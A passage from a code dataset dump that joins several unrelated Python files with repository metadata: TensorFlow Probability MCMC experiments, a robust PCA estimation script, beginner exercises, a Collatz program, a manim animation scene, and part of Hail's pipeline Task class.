beta_ = ind_ * beta_raw_
concentration_ = tf.exp(alpha_ + tf.matmul(tf.cast(x, dtype), beta_))
predictions_ = tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=concentration_,
name="predictions")
return(tf.reduce_sum(rv_alpha.log_prob(alpha_))
+ tf.reduce_sum(rv_mu_b.log_prob(mu_b_))
+ tf.reduce_sum(rv_sigma_b.log_prob(sigma_b_))
+ tf.reduce_sum(rv_b_offset.log_prob(b_offset_))
+ tf.reduce_sum(rv_ind.log_prob(ind_))
+ tf.reduce_sum(predictions_.log_prob(y))
)
init_ind_raw = tf.zeros(beta_size, name="init_ind_raw")
params_old = [
init_pred,
init_alpha,
init_mu_b,
init_sigma_b,
init_b_offset,
init_ind,
]
#%%
init_old = [
init_alpha,
init_mu_b,
init_sigma_b,
init_b_offset,
init_ind,
]
print(log_joint_old(*params_old))
plp_old = lambda *args: log_joint_old(init_pred, *args)
@tf.function
def do_sampling_old():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=init_old,
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=plp_old,
step_size=0.01,
num_leapfrog_steps=10))
states_old, kernel_results_old = do_sampling_old()
#%%
print(states_old)
#%%
def target_log_prob_fn_2(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
b_raw_ = mu_b_ + sigma_b_ * b_offset_
beta_ = ind_ * b_raw_
conc_ = tf.exp(alpha_ + tf.matmul(tf.cast(x, dtype), beta_))
return test_model.log_prob((mu_b_, sigma_b_, b_offset_, b_raw_, ind_, beta_, alpha_, conc_, tf.cast(y, dtype)))
def target_log_prob_fn(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
return test_model.log_prob((mu_b_, sigma_b_, b_offset_, ind_, alpha_, tf.cast(y, dtype)))
num_results = 5000
num_burnin_steps = 3000
@tf.function
def do_sampling_seq():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=params,
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_2,
step_size=0.4,
num_leapfrog_steps=3))
states_seq, kernel_results_seq = do_sampling_seq()
#%%
print(states_seq)
#%%
def edward_model(x, n_total, K):
"""
Model definition in Edward2
:param x: numpy array [NxD] - covariate matrix
:param n_total: numpy array [N] - number of cells per sample
:param K: Number of cell types
:return: none
"""
N, D = x.shape
# normal prior on bias
alpha = ed.Normal(loc=tf.zeros([K]), scale=tf.ones([K]) * 5, name="alpha")
# Noncentered parametrization for raw slopes (before spike-and-slab)
mu_b = ed.Normal(loc=tf.zeros(1, dtype=dtype), scale=tf.ones(1, dtype=dtype), name="mu_b")
sigma_b = ed.HalfCauchy(tf.zeros(1, dtype=dtype), tf.ones(1, dtype=dtype), name="sigma_b")
b_offset = ed.Normal(loc=tf.zeros([D, K], dtype=dtype), scale=tf.ones([D, K], dtype=dtype), name="b_offset")
b_raw = mu_b + sigma_b * b_offset
# Spike-and-slab priors
sigma_ind_raw = ed.Normal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype),
name='sigma_ind_raw')
ind_t = sigma_ind_raw * 50
ind = tf.exp(ind_t) / (1 + tf.exp(ind_t))
# Calculate betas
beta = ind * b_raw
# Concentration vector from intercepts, slopes
concentration_ = tf.exp(alpha + tf.matmul(x, beta))
# Cell count prediction via DirMult
predictions = ed.DirichletMultinomial(n_total, concentration=concentration_, name="predictions")
return predictions
# Joint posterior distribution
log_joint_ed = ed.make_log_joint_fn(edward_model)
# Function to compute log posterior probability
target_log_prob_fn_ed = lambda alpha_, mu_b_, sigma_b_, b_offset_, sigma_ind_raw_: \
log_joint_ed(x=tf.cast(x, dtype),
n_total=tf.cast(n_total, dtype),
K=K,
predictions=tf.cast(y, dtype),
alpha=alpha_,
mu_b=mu_b_,
sigma_b=sigma_b_,
b_offset=b_offset_,
sigma_ind_raw=sigma_ind_raw_,
)
alpha_size = [K]
beta_size = [D, K]
# MCMC starting values
params_ed = [tf.zeros(alpha_size, name='init_alpha', dtype=dtype),
# tf.random.normal(alpha_size, 0, 1, name='init_alpha'),
tf.zeros(1, name="init_mu_b", dtype=dtype),
tf.ones(1, name="init_sigma_b", dtype=dtype),
tf.zeros(beta_size, name='init_b_offset', dtype=dtype),
# tf.random.normal(beta_size, 0, 1, name='init_b_offset'),
tf.zeros(beta_size, name='init_sigma_ind_raw', dtype=dtype),
]
print(target_log_prob_fn_ed(params_ed[0], params_ed[1], params_ed[2], params_ed[3], params_ed[4]))
#%%
num_schools = 8 # number of schools
treatment_effects = np.array(
[28, 8, -3, 7, -1, 1, 18, 12], dtype=np.float32) # treatment effects
treatment_stddevs = np.array(
[15, 10, 16, 11, 9, 11, 10, 18], dtype=np.float32) # treatment SE
#%%
model_seq = tfd.JointDistributionSequential([
tfd.Normal(loc=0., scale=10., name="avg_effect"), # `mu` above
tfd.Normal(loc=5., scale=1., name="avg_stddev"), # `log(tau)` above
tfd.Independent(tfd.Normal(loc=tf.zeros(num_schools),
scale=tf.ones(num_schools),
name="school_effects_standard"), # `theta_prime`
reinterpreted_batch_ndims=1),
lambda school_effects_standard, avg_stddev, avg_effect: (
tfd.Independent(tfd.Normal(loc=(avg_effect[..., tf.newaxis] +
tf.exp(avg_stddev[..., tf.newaxis]) *
school_effects_standard), # `theta` above
scale=treatment_stddevs),
name="treatment_effects", # `y` above
reinterpreted_batch_ndims=1))
])
def target_log_prob_fn_seq(avg_effect, avg_stddev, school_effects_standard):
"""Unnormalized target density as a function of states."""
return model_seq.log_prob((
avg_effect, avg_stddev, school_effects_standard, treatment_effects))
print(model_seq.log_prob([tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
treatment_effects
]))
print(model_seq.sample())
#%%
model_named = tfd.JointDistributionNamed(dict(
avg_effect=tfd.Normal(loc=0., scale=10., name="avg_effect"), # `mu` above
avg_stddev=tfd.Normal(loc=5., scale=1., name="avg_stddev"), # `log(tau)` above
school_effects_standard=tfd.Independent(tfd.Normal(loc=tf.zeros(num_schools),
scale=tf.ones(num_schools),
name="school_effects_standard"), # `theta_prime`
reinterpreted_batch_ndims=1),
treatment_effects=lambda school_effects_standard, avg_stddev, avg_effect: (
tfd.Independent(tfd.Normal(loc=(avg_effect[..., tf.newaxis] +
tf.exp(avg_stddev[..., tf.newaxis]) *
school_effects_standard), # `theta` above
scale=treatment_stddevs),
name="treatment_effects", # `y` above
reinterpreted_batch_ndims=1))
))
def target_log_prob_fn_named(avg_effect, avg_stddev, school_effects_standard):
"""Unnormalized target density as a function of states."""
return model_named.log_prob((
avg_effect, avg_stddev, school_effects_standard, treatment_effects))
print(model_named.log_prob(dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
treatment_effects=treatment_effects
)))
print(model_named.sample())
#%%
num_results = 5000
num_burnin_steps = 3000
# Improve performance by tracing the sampler using `tf.function`
# and compiling it using XLA.
@tf.function
def do_sampling_named():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
),
#current_state=(
# tf.zeros([], name='init_avg_effect'),
# tf.zeros([], name='init_avg_stddev'),
# tf.ones([num_schools], name='init_school_effects_standard'),
#),
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_named,
step_size=0.4,
num_leapfrog_steps=3))
states_named, kernel_results_named = do_sampling_named()
#%%
@tf.function
def do_sampling_seq():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=[
tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
],
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_seq,
step_size=0.4,
num_leapfrog_steps=3))
states_seq, kernel_results_seq = do_sampling_seq()
#%%
print(states_seq)
#%%
avg_effect, avg_stddev, school_effects_standard = states
school_effects_samples = (
avg_effect[:, np.newaxis] +
np.exp(avg_stddev)[:, np.newaxis] * school_effects_standard)
num_accepted = np.sum(kernel_results.is_accepted)
print('Acceptance rate: {}'.format(num_accepted / num_results))
#%%
current_state = [
tf.zeros([], name='init_avg_effect'),
tf.zeros([], name='init_avg_stddev'),
tf.ones([num_schools], name='init_school_effects_standard'),
]
current_state_2 = dict(avg_effect=tf.zeros([], name='init_avg_effect'),
avg_stddev=tf.zeros([], name='init_avg_stddev'),
school_effects_standard=tf.ones([num_schools], name='init_school_effects_standard'),
)
[tf.convert_to_tensor(value=x) for x in current_state_2]
#%%
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
init_state = current_state_2
if not (mcmc_util.is_list_like(init_state) or isinstance(init_state, dict)):
init_state = [init_state]
print(init_state)
if isinstance(init_state, dict):
init_state = {k: tf.convert_to_tensor(value=v) for k, v in init_state.items()}
else:
init_state = [tf.convert_to_tensor(value=x) for x in init_state]
print(init_state)
#%%
# minimal example for github issue
b = np.random.normal(0., 1.)
model_seq = tfd.JointDistributionSequential([
tfd.Normal(loc=0., scale=1., name="a"),
lambda a: tfd.Normal(loc=a, scale=1., name="b")
])
def target_log_prob_fn_seq(a):
return model_seq.log_prob((a, b))
init_seq = [tf.zeros([], name="init_a")]
model_name = tfd.JointDistributionNamed(dict(
a=tfd.Normal(loc=0., scale=1., name="a"),
b=lambda a: tfd.Normal(loc=a, scale=1., name="b")
))
def target_log_prob_fn_name(a):
return model_name.log_prob((a, b))
init_name = dict(a=tf.zeros([], name="init_a"))
num_results = 5000
num_burnin_steps = 3000
@tf.function
def sample_mcmc(init, target_log_prob_fn):
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=init,
kernel=tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn,
step_size=0.01,
num_leapfrog_steps=3))
states_seq, kernel_results_seq = sample_mcmc(init_seq, target_log_prob_fn_seq)
print(states_seq)
#%%
states_name, kernel_results_name = sample_mcmc(init_name, target_log_prob_fn_name)
print(states_seq)
|
[
"johannes.ostner@online.de"
] |
johannes.ostner@online.de
|
5d9a610b671aea260855ece5544c4f19615d8bfd
|
cc157f558008596a8cef86fe495fe6166b154c8a
|
/robust/trig-pca.py
|
4537416c5cc8e72ff46f7fffd5ea0fb0f441ca78
|
[] |
no_license
|
Albuso0/estimator_test
|
f2c2d1f1e3e812ed6a1925c70227fae6775836c3
|
085a94e13148c614123fd2277342b452660f47a2
|
refs/heads/master
| 2021-01-13T00:48:24.926191
| 2019-06-04T03:34:31
| 2019-06-04T03:34:31
| 51,336,220
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
import numpy as np
from numpy.random import randn
from numpy.linalg import eigh, norm
def dist(u,v):
d = len(u)
c = -np.sum(u-v)/d
return norm(u-v+c*np.ones(d))
def lead_eigvec(m):
w, v = eigh(m)
idx = w.argsort()[::-1]
w = w[idx]
v = v[:,idx]
return v[:,0]
def exp(n,d,eps):
x = randn(n,d)
vQ = np.ones(d)
for i in range(0,d,2):
vQ[i]=-1
nQ = int(n*eps)
Q = np.tile(vQ,(nQ,1))
x[0:nQ,:] = x[0:nQ,:] + Q
mu_base = np.mean(x[nQ:,:], axis=0)
mu_naive = np.mean(x, axis=0)
# print(mu_base, '\n')
y = np.exp(1j*x)
m = y.T @ y.conjugate() / n
m1 = (m-np.eye(d))*np.exp(1)+np.eye(d)
# m1 = np.ones((d,d))
# print(m1,'\n')
z = lead_eigvec(m1)
mu = np.angle(z)
for i in range(d):
if mu[i]<-3:
mu[i] += 2*np.pi
# print(mu,'\n')
dtrig = dist(mu,np.zeros(d))
dbase = dist(mu_base,np.zeros(d))
excess = dtrig - dbase
return dtrig, dbase, excess
def population_exp(d, eps):
vQ = np.ones(d)
for i in range(0,d,2):
vQ[i]=-1
zQ = np.exp(1j*vQ)
mQ = np.outer(zQ, zQ.conjugate())
m = (1-eps)* ( (np.ones((d,d)) - np.eye(d))*np.exp(-1)+np.eye(d) ) + eps * ( (mQ - np.eye(d))*np.exp(-1)+np.eye(d) )
m1 = (m-np.eye(d))*np.exp(1)+np.eye(d)
# print(m1)
z = lead_eigvec(m1)
mu = np.angle(z)
for i in range(d):
if mu[i]<-3:
mu[i] += 2*np.pi
# print(mu)
dtrig = dist(mu,np.zeros(d))
return dtrig
# d=2
# n=50000
# eps = 0.
# dtrig, dbase, excess = exp(n,d,eps)
# dtrig_p = population_exp(d,eps)
# print(d, n, dtrig, dbase, excess, excess/np.sqrt(d), dtrig_p, dtrig_p/np.sqrt(d))
## test estimation error scaling with d
for d in range(20,401,5):
n = d*10
eps = 0.1
dtrig, dbase, excess = exp(n,d,eps)
dtrig_p = population_exp(d,eps)
print(d, n, dtrig, dbase, excess, excess/np.sqrt(d), dtrig_p, dtrig_p/np.sqrt(d))
|
[
"pengkuny@princeton.edu"
] |
pengkuny@princeton.edu
|
95a8bc7f9e30737cf5cadb80f990f0fd2ae4ece8
|
7092de5632b9f0f07bd3af1d84162c36d83399bc
|
/20200321.py
|
7f1c56773e5aaf7708bfc36fb31596384a560a67
|
[] |
no_license
|
wjc1022/hello-python
|
96f98a1b51136552128b18a882721c2238db52ce
|
9f2b680318d9a051ac10427ca889645f3afd54ec
|
refs/heads/master
| 2021-03-01T06:20:15.383411
| 2020-03-24T14:41:58
| 2020-03-24T14:41:58
| 245,759,953
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
#廖雪峰 使用list和tuple#
# https://www.liaoxuefeng.com/wiki/1016959663602400/1017092876846880
# -*- coding: utf-8 -*-
L = [
['Apple', 'Google', 'Microsoft'],
['Java', 'Python', 'Ruby', 'PHP'],
['Adam', 'Bart', 'Lisa']
]
# 打印Apple:
print(L[0][0])
# 打印Python:
print(L[1][1])
# 打印Lisa:
print(L[2][2])
# 请问以下变量哪些是tuple类型:
#c
a = ()
b = (1)
c = [2]
d = (3,)
e = (4,5,6)
#条件判断
#小明身高1.75,体重80.5kg。
# 请根据BMI公式(体重除以身高的平方)帮小明计算他的BMI指数,
# 并根据BMI指数:
# 低于18.5:过轻
# 18.5-25:正常
# 25-28:过重
# 28-32:肥胖
# 高于32:严重肥胖
# -*- coding: utf-8 -*-
height = 1.75
weight = 80.5
bmi = weight/height/height
if bmi < 18.5 :
print(bmi,'过轻')
elif 18.5 < bmi < 25:
print(bmi,'正常')
elif 25 < bmi < 28:
print(bmi,'过重')
elif 28 < bmi < 32:
print(bmi,'肥胖')
else:
print(bmi,'严重肥胖')
#循环
# 练习
# 请利用循环依次对list中的每个名字打印出Hello, xxx!:
l = ['Bart', 'Lisa', 'Adam']
for name in l :
print('Hello,'+ name)
|
[
"61908340+wzy0604@users.noreply.github.com"
] |
61908340+wzy0604@users.noreply.github.com
|
8ffa5956491d37c182af81da35db2a86a9de9ff7
|
3b82764ceb20d1d969c66735d0c651f5c59559c2
|
/as1/collatz.py
|
681dc1e788a3ede8f7828277469d68b0411c3997
|
[] |
no_license
|
sawyermade/advanced-python
|
d4bb24d5b6843cb1150836b2f2613952d542b7af
|
dff32f8a933f641e1298d702b7ec904cf42c1a7d
|
refs/heads/master
| 2021-08-23T06:40:35.480626
| 2017-12-03T23:38:13
| 2017-12-03T23:38:13
| 105,158,454
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
'''
Daniel Sawyer Assignment 1 Collatz Fall 2017
'''
def collatz_sequence():
#try and except to make sure input is integer
try:
n = int(input('Enter number: '))
# except Exception as e:
except ValueError:
#print(e)
print('Invalid input: must be an integer')
return False
print()
#if user enter 1, outputs 1 and returns true
if n == 1:
print(n)
return True
#loop collatz until it reaches 1
while n > 1:
n = collatz(n)
return True
def collatz(number):
if number % 2 == 0:
print(number//2)
return number//2
else:
print(3*number+1)
return 3*number+1
# if __name__ == "__main__":
# collatz_sequence()
# exit()
collatz_sequence()
exit()
|
[
"sawyermade@gmail.com"
] |
sawyermade@gmail.com
|
8742bce90ee9b3cc66ac7fcd32df979e8bd3a412
|
c9f70590f9a2c3d5bc89ae03458947245258bc1f
|
/manim/AnimateExample.py
|
1e25ab389beba09fec5f27649de2be7664b0b5a3
|
[
"ISC"
] |
permissive
|
thobl/ipelets
|
4d3cea5a35098678d2ec3da7f0c137185ae6956e
|
f197e7ae52547c4ba85d2458ae0013ed8f0169f7
|
refs/heads/master
| 2022-11-22T01:32:26.972198
| 2022-11-07T16:53:14
| 2022-11-07T16:53:14
| 353,351,287
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,851
|
py
|
from manim import *
class AnimateExample(Scene):
def construct(self):
self.camera.background_color = WHITE
## view 1
object_with_no_label1_v1_points = [
[-4.5511111111111, 1.44, 0],
[-6.1511111111111, 0.48, 0],
[-3.5911111111111, 0.16, 0],
]
object_with_no_label1_v1 = Polygon(
*object_with_no_label1_v1_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.827, 0.827, 0.827]),
fill_opacity=1,
)
circle_v1 = Circle(
radius=0.64,
arc_center=[-3.2711111111111, -1.12, 0.0],
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.565, 0.933, 0.565]),
fill_opacity=1,
)
oktagon_v1_points = [
[0.24888888888889, -0.8, 0],
[-0.032291111111111, -0.12118, 0],
[-0.71111111111111, 0.16, 0],
[-1.3899311111111, -0.12118, 0],
[-1.6711111111111, -0.8, 0],
[-1.3899311111111, -1.47882, 0],
[-0.71111111111111, -1.76, 0],
[-0.032291111111111, -1.47882, 0],
]
oktagon_v1 = Polygon(
*oktagon_v1_points,
color=rgb_to_color([0.0, 0.392, 0.0]),
)
square_v1_points = [
[-6.4711111111111, -0.48, 0],
[-6.4711111111111, -1.76, 0],
[-5.1911111111111, -1.76, 0],
[-5.1911111111111, -0.48, 0],
]
square_v1 = Polygon(
*square_v1_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([1.0, 1.0, 0.878]),
fill_opacity=1,
)
self.play(
Create(object_with_no_label1_v1),
Create(circle_v1),
Create(oktagon_v1),
Create(square_v1),
)
## view 2
circle_v2 = Circle(
radius=0.64,
arc_center=[-3.2711111111111, -2.4, 0.0],
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.565, 0.933, 0.565]),
fill_opacity=1,
)
oktagon_v2_points = [
[0.24888888888889, -0.8, 0],
[-0.032291111111111, -0.12118, 0],
[-0.71111111111111, 0.16, 0],
[-1.3899311111111, -0.12118, 0],
[-1.6711111111111, -0.8, 0],
[-1.3899311111111, -1.47882, 0],
[-0.71111111111111, -1.76, 0],
[-0.032291111111111, -1.47882, 0],
]
oktagon_v2 = Polygon(
*oktagon_v2_points,
stroke_opacity=0.0,
fill_color=rgb_to_color([0.565, 0.933, 0.565]),
fill_opacity=1,
)
square_v2_points = [
[-6.7362031111111, -1.12, 0],
[-5.8311071111111, -2.025096, 0],
[-4.9260111111111, -1.12, 0],
[-5.8311071111111, -0.2149, 0],
]
square_v2 = Polygon(
*square_v2_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([1.0, 1.0, 0.878]),
fill_opacity=1,
)
self.play(
FadeOut(object_with_no_label1_v1),
Transform(circle_v1, circle_v2),
Transform(oktagon_v1, oktagon_v2),
Transform(square_v1, square_v2),
)
self.remove(object_with_no_label1_v1)
self.remove(circle_v1)
self.remove(oktagon_v1)
self.remove(square_v1)
## view 3
object_with_no_label1_v3_points = [
[-4.5511111111111, 1.44, 0],
[-6.1511111111111, 0.48, 0],
[-3.5911111111111, 0.16, 0],
]
object_with_no_label1_v3 = Polygon(
*object_with_no_label1_v3_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.827, 0.827, 0.827]),
fill_opacity=1,
)
circle_v3 = Circle(
radius=0.64,
arc_center=[-3.2711111111111, -1.12, 0.0],
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.565, 0.933, 0.565]),
fill_opacity=1,
)
square_v3_points = [
[-6.4711111111111, -0.48, 0],
[-6.4711111111111, -1.76, 0],
[-5.1911111111111, -1.76, 0],
[-5.1911111111111, -0.48, 0],
]
square_v3 = Polygon(
*square_v3_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([1.0, 1.0, 0.878]),
fill_opacity=1,
)
object_with_no_label2_v3_points = [
[-2.6311111111111, 1.12, 0],
[-1.6711111111111, -0.48, 0],
[-1.0311111111111, 1.12, 0],
]
object_with_no_label2_v3 = Polygon(
*object_with_no_label2_v3_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.827, 0.827, 0.827]),
fill_opacity=1,
)
triangle_v3_points = [
[-6.7911111111111, -3.68, 0],
[-5.5111111111111, -2.4, 0],
[-4.5511111111111, -3.68, 0],
]
triangle_v3 = Polygon(
*triangle_v3_points,
color=rgb_to_color([0.0, 0.0, 0.0]),
fill_color=rgb_to_color([0.678, 0.847, 0.902]),
fill_opacity=1,
)
oktagon_v3_points = [
[0.24888888888889, -0.8, 0],
[-0.032291111111111, -0.12118, 0],
[-0.71111111111111, 0.16, 0],
[-1.3899311111111, -0.12118, 0],
[-1.6711111111111, -0.8, 0],
[-1.3899311111111, -1.47882, 0],
[-0.71111111111111, -1.76, 0],
[-0.032291111111111, -1.47882, 0],
]
oktagon_v3 = Polygon(
*oktagon_v3_points,
color=rgb_to_color([0.0, 0.392, 0.0]),
)
self.play(
Create(object_with_no_label1_v3),
Transform(circle_v2, circle_v3),
Transform(square_v2, square_v3),
Create(object_with_no_label2_v3),
Create(triangle_v3),
Transform(oktagon_v2, oktagon_v3),
)
self.remove(circle_v2)
self.remove(square_v2)
self.remove(oktagon_v2)
## view 4
self.play(
FadeOut(object_with_no_label1_v3),
FadeOut(circle_v3),
FadeOut(square_v3),
FadeOut(oktagon_v3),
)
self.remove(object_with_no_label1_v3)
self.remove(circle_v3)
self.remove(square_v3)
self.remove(oktagon_v3)
## view 5
self.play(
FadeOut(triangle_v3),
FadeOut(object_with_no_label2_v3),
)
self.remove(triangle_v3)
self.remove(object_with_no_label2_v3)
|
[
"thomas.blaesius@kit.edu"
] |
thomas.blaesius@kit.edu
|
00c84dfe665dbb738ca50b70040e7c837c595038
|
4f9930e15c02cb9a09af70d66b794480b8c9bd57
|
/hail/python/hailtop/pipeline/task.py
|
a2472c4ff18e3f5de5f9d7a3a7b3edab693c4253
|
[
"MIT"
] |
permissive
|
gsarma/hail
|
d76aa16d718618c1915b629077fd80cbc4d3b526
|
6aa2d945bb7d57c463d5ab9afb686f18c2941b25
|
refs/heads/master
| 2020-06-20T06:09:43.408615
| 2019-10-29T21:40:23
| 2019-10-29T21:40:23
| 196,250,453
| 0
| 0
|
MIT
| 2019-07-10T17:44:48
| 2019-07-10T17:44:47
| null |
UTF-8
|
Python
| false
| false
| 12,654
|
py
|
import re
from .resource import ResourceFile, ResourceGroup
from .utils import PipelineException
def _add_resource_to_set(resource_set, resource, include_rg=True):
if isinstance(resource, ResourceGroup):
rg = resource
if include_rg:
resource_set.add(resource)
else:
resource_set.add(resource)
if isinstance(resource, ResourceFile) and resource._has_resource_group():
rg = resource._get_resource_group()
else:
rg = None
if rg is not None:
for _, resource_file in rg._resources.items():
resource_set.add(resource_file)
class Task:
"""
Object representing a single job to execute.
Examples
--------
Create a pipeline object:
>>> p = Pipeline()
Create a new pipeline task that prints hello to a temporary file `t.ofile`:
>>> t = p.new_task()
>>> t.command(f'echo "hello" > {t.ofile}')
Write the temporary file `t.ofile` to a permanent location
>>> p.write_output(t.ofile, 'hello.txt')
Execute the DAG:
>>> p.run()
Notes
-----
This class should never be created directly by the user. Use `Pipeline.new_task` instead.
"""
_counter = 0
_uid_prefix = "__TASK__"
_regex_pattern = r"(?P<TASK>{}\d+)".format(_uid_prefix)
@classmethod
def _new_uid(cls):
uid = "{}{}".format(cls._uid_prefix, cls._counter)
cls._counter += 1
return uid
def __init__(self, pipeline, name=None, attributes=None):
self._pipeline = pipeline
self.name = name
self.attributes = attributes
self._cpu = None
self._memory = None
self._storage = None
self._image = None
self._command = []
self._resources = {} # dict of name to resource
self._resources_inverse = {} # dict of resource to name
self._uid = Task._new_uid()
self._inputs = set()
self._internal_outputs = set()
self._external_outputs = set()
self._mentioned = set() # resources used in the command
self._valid = set() # resources declared in the appropriate place
self._dependencies = set()
def _get_resource(self, item):
if item not in self._resources:
r = self._pipeline._new_task_resource_file(self)
self._resources[item] = r
self._resources_inverse[r] = item
return self._resources[item]
def __getitem__(self, item):
return self._get_resource(item)
def __getattr__(self, item):
return self._get_resource(item)
def _add_internal_outputs(self, resource):
_add_resource_to_set(self._internal_outputs, resource, include_rg=False)
def _add_inputs(self, resource):
_add_resource_to_set(self._inputs, resource, include_rg=False)
def declare_resource_group(self, **mappings):
"""
Declare a resource group for a task.
Examples
--------
Declare a resource group:
>>> input = p.read_input_group(bed='data/example.bed',
... bim='data/example.bim',
... fam='data/example.fam')
>>> t = p.new_task()
>>> t.declare_resource_group(tmp1={'bed': '{root}.bed',
... 'bim': '{root}.bim',
... 'fam': '{root}.fam',
... 'log': '{root}.log'})
>>> t.command(f"plink --bfile {input} --make-bed --out {t.tmp1}")
Caution
-------
Be careful when specifying the expressions for each file as this is Python
code that is executed with `eval`!
Parameters
----------
mappings: :obj:`dict` of :obj:`str` to :obj:`dict` of :obj:`str` to :obj:`str`
Keywords are the name(s) of the resource group(s). The value is a dict
mapping the individual file identifier to a string expression representing
how to transform the resource group root name into a file. Use `{root}`
for the file root.
Returns
-------
:class:`.Task`
Same task object with resource groups set.
"""
for name, d in mappings.items():
assert name not in self._resources
if not isinstance(d, dict):
raise PipelineException(f"value for name '{name}' is not a dict. Found '{type(d)}' instead.")
rg = self._pipeline._new_resource_group(self, d)
self._resources[name] = rg
_add_resource_to_set(self._valid, rg)
return self
def depends_on(self, *tasks):
"""
Explicitly set dependencies on other tasks.
Examples
--------
Create the first task:
>>> t1 = p.new_task()
>>> t1.command(f'echo "hello"')
Create the second task that depends on `t1`:
>>> t2 = p.new_task()
>>> t2.depends_on(t1)
>>> t2.command(f'echo "world"')
Notes
-----
Dependencies between tasks are automatically created when resources from
one task are used in a subsequent task. This method is only needed when
no intermediate resource exists and the dependency needs to be explicitly
set.
Parameters
----------
tasks: :class:`.Task`, varargs
Sequence of tasks to depend on.
Returns
-------
:class:`.Task`
Same task object with dependencies set.
"""
for t in tasks:
self._dependencies.add(t)
def command(self, command):
"""
Set the task's command to execute.
Examples
--------
Simple task with no output files:
>>> p = Pipeline()
>>> t1 = p.new_task()
>>> t1.command(f'echo "hello"')
>>> p.run()
Simple task with one temporary file `t2.ofile` that is written to a
permanent location:
>>> p = Pipeline()
>>> t2 = p.new_task()
>>> t2.command(f'echo "hello world" > {t2.ofile}')
>>> p.write_output(t2.ofile, 'output/hello.txt')
>>> p.run()
Two tasks with a file interdependency:
>>> p = Pipeline()
>>> t3 = p.new_task()
>>> t3.command(f'echo "hello" > {t3.ofile}')
>>> t4 = p.new_task()
>>> t4.command(f'cat {t3.ofile} > {t4.ofile}')
>>> p.write_output(t4.ofile, 'output/cat_output.txt')
>>> p.run()
Specify multiple commands in the same task:
>>> p = Pipeline()
>>> t5 = p.new_task()
>>> t5.command(f'echo "hello" > {t5.tmp1}')
>>> t5.command(f'echo "world" > {t5.tmp2}')
>>> t5.command(f'echo "!" > {t5.tmp3}')
>>> t5.command(f'cat {t5.tmp1} {t5.tmp2} {t5.tmp3} > {t5.ofile}')
>>> p.write_output(t5.ofile, 'output/concatenated.txt')
>>> p.run()
Notes
-----
This method can be called more than once. It's behavior is to
append commands to run to the set of previously defined commands
rather than overriding an existing command.
To declare a resource file of type :class:`.TaskResourceFile`, use either
the get attribute syntax of `task.{identifier}` or the get item syntax of
`task['identifier']`. If an object for that identifier doesn't exist,
then one will be created automatically (only allowed in the :meth:`.command`
method). The identifier name can be any valid Python identifier
such as `ofile5000`.
All :class:`.TaskResourceFile` are temporary files and must be written
to a permanent location using :func:`.Pipeline.write_output` if the output needs
to be saved.
Only Resources can be referred to in commands. Referencing a :class:`.Pipeline`
or :class:`.Task` will result in an error.
Parameters
----------
command: :obj:`str`
Returns
-------
:class:`.Task`
Same task object with command appended.
"""
def handler(match_obj):
groups = match_obj.groupdict()
if groups['TASK']:
raise PipelineException(f"found a reference to a Task object in command '{command}'.")
if groups['PIPELINE']:
raise PipelineException(f"found a reference to a Pipeline object in command '{command}'.")
assert groups['RESOURCE_FILE'] or groups['RESOURCE_GROUP']
r_uid = match_obj.group()
r = self._pipeline._resource_map.get(r_uid)
if r is None:
raise PipelineException(f"undefined resource '{r_uid}' in command '{command}'.\n"
f"Hint: resources must be from the same pipeline as the current task.")
if r._source != self:
self._add_inputs(r)
if r._source is not None:
if r not in r._source._valid:
name = r._source._resources_inverse[r]
raise PipelineException(f"undefined resource '{name}'\n"
f"Hint: resources must be defined within "
"the task methods 'command' or 'declare_resource_group'")
self._dependencies.add(r._source)
r._source._add_internal_outputs(r)
else:
_add_resource_to_set(self._valid, r)
self._mentioned.add(r)
return f"${{{r_uid}}}"
